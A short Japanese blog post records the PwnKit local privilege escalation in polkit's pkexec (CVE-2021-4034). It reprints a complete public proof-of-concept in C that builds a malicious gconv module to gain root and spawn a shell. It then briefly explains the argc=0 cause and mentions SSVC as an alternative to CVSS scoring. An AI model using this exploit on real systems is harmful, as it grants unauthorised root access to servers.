今更だけど記録しておこうと思ったんだった。
「PolKit」という、Linuxとかに入っているシステム全体の権限を管理するツールに脆弱性が見つかったとか。知らなかったけど、普通に重要なツールぽくて職場のサーバとかにも入ってた。
何が起こるか
一般ユーザが特権になれてしまうというもので、CVSS Scoreは7.8。ちょい前に話題になってたLog4jみたいに外から入れる訳ではないけど、それでもかなり高いほうらしい。再現コードも公開されていて、以下のように短いコードでいける。
/* * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu> * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> char *shell = "#include <stdio.h>\n" "#include <stdlib.h>\n" "#include <unistd.h>\n\n" "void gconv() {}\n" "void gconv_init() {\n" " setuid(0); setgid(0);\n" " seteuid(0); setegid(0);\n" " system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n" " exit(0);\n" "}"; int main(int argc, char *argv[]) { FILE *fp; system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'"); system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules"); fp = fopen("pwnkit/pwnkit.c", "w"); fprintf(fp, "%s", shell); fclose(fp); system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC"); char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL }; execve("/usr/bin/pkexec", (char*[]){NULL}, env); }
原因は
blog.qualys.com
今読んでる。
Linuxが引数なし(argc=0)でexecve()を実行できてしまう事で、環境変数に設定しておいた任意のコマンドを実行させる事が出来る…みたいな。上のサンプルでもsetuid(0)とかやってるからそんな感じだろう。
説明を見ると初歩的な感じもする(自分なら気付いたとかじゃなくて、界隈の凄い人たちでも見逃すんだなって意味で)けど、12年前からあった不具合だとか。こういうセキュリティに関わるプロセスでも残ってるんですね。まぁ定期的(体感年1~2回くらい)に脆弱性が話題になりますしね…
あと、この件ググってて知ったけど、CVSSは課題が色々あるのでSSVCというのを使おう(使い分けよう?)という話題があるらしい。詳しくは以下で。
SSVC(Stakeholder-Specific Vulnerability Categorization)を活用した脆弱性管理 | PwC Japanグループ